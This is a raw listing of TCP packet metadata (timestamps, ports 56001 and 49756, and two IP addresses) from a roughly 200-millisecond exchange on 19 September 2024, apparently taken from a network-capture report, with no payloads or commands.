Sep 19, 2024 02:25:52.631467104 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.631495953 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.631515026 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.631532907 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.631550074 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.631568909 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.631586075 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.631603956 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.631638050 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.631638050 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.631638050 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.631638050 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.632263899 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.632329941 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.632334948 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.632417917 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.632436037 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.632453918 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.632472038 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.632488012 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.632488966 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.632514954 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.632534981 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.632551908 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.632554054 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.632554054 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.632570028 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.632582903 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.632626057 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.633207083 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.633225918 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.633251905 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.633279085 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.633299112 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.633308887 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.633327007 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.633344889 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.633363008 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.633379936 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.633398056 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.633414984 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.633420944 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.633454084 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.634165049 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.634232044 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.634258032 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.634275913 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.634303093 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.634318113 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.634320974 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.634339094 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.634356976 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.634372950 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.634376049 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.634394884 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.634413004 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.634416103 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.634430885 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.634463072 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.634485006 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.635173082 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.635199070 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.635216951 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.635234118 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.635252953 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.635268927 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.635302067 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.719805956 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.719860077 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.719876051 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.719878912 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.719907045 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.719937086 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.719994068 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.720011950 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.720033884 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.720207930 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.720236063 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.720278978 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.720401049 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.720419884 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.720438004 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.720443010 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.720457077 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.720494986 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.720624924 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.720664978 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.720760107 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.720782042 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.720799923 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.720817089 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.720833063 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.720834970 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.720853090 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.720863104 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.720870972 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.720896959 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.721318960 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.721338034 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.721355915 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.721359968 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.721380949 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.721400023 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.721405029 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.721417904 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.721436024 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.721437931 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.721455097 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.721472979 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.721481085 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.721489906 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.721509933 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.721513987 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.721551895 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.722321987 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.722340107 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.722367048 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.722383976 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.722402096 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.722405910 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.722419977 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.722435951 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.722439051 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.722457886 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.722465038 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.722476006 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.722493887 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.722505093 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.722512960 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.722556114 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.723325014 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.723344088 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.723361015 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.723368883 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.723378897 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.723404884 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.723419905 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.723423958 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.723442078 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.723443985 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.723462105 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.723481894 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.723968983 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.723988056 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.724006891 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.724023104 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.724025011 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.724044085 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.724805117 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.724822998 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.724839926 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.724845886 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.724858046 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.724875927 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.724886894 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.724895000 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.724912882 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.724917889 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.724958897 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.725133896 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.725151062 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.725167990 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.725184917 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.725202084 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.725207090 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.725219965 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.725225925 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.725239992 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.725258112 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.725258112 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.725478888 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.725779057 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.725805998 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.725822926 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.725840092 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.725858927 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.725861073 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.725877047 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.725893974 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.725894928 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.725914001 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.725919008 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.725933075 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.725972891 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.726576090 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.726593971 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.726613045 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.726623058 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.726629972 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.726648092 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.726654053 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.726666927 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.726682901 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.726686001 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.726741076 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.726917028 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.812880993 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.812942982 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.812988043 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.813011885 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.813082933 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.813112020 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.813138962 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.813157082 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.813174009 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.813180923 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.813193083 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.813230991 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.813277960 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.813296080 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.813313961 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.813332081 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.813338041 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.813349962 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.813349962 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.813373089 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.813385010 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.813400030 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.813417912 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.813436031 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.813453913 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.813458920 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.813473940 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.813479900 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.813493967 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.813510895 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.813520908 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.813538074 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.813555956 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.813574076 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.813575029 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.813591003 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.813594103 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.813611031 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.813630104 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.813647985 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.813648939 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.813664913 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.813726902 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.813815117 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.813832998 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.813863039 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.813868999 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.813883066 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.813888073 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.813905954 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.813924074 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.813951015 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.813967943 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.814157009 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.814176083 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.814193010 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.814210892 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.814218998 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.814229965 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.814246893 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.814256907 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.814274073 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.814276934 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.814291954 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.814310074 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.814327002 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.814327002 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.814356089 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.814363956 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.814374924 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.814402103 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.814410925 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.814421892 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.814448118 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.814465046 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.814465046 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.814483881 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.814502954 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.814519882 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.814519882 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.814537048 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.814538956 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.814555883 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.814572096 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.814574003 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.814593077 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.814610004 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.814627886 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.814629078 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.814654112 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.814924955 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.814944029 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.814960003 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.814969063 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.814987898 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.815005064 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.815006018 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.815026045 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.815042973 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.815061092 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.815061092 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.815083027 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.815093994 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.815102100 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.815120935 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.815124989 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.815169096 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.815444946 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.815463066 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.815484047 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.815505981 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.815586090 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.815603018 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.815623045 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.815630913 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.815639973 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.815654993 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.815658092 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.815686941 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.815692902 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.815706015 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.815732002 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.815751076 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.815757990 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.815768957 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.815787077 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.815789938 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.815804958 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.815821886 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.815824032 CEST	49756	56001	192.168.2.6	45.11.229.96
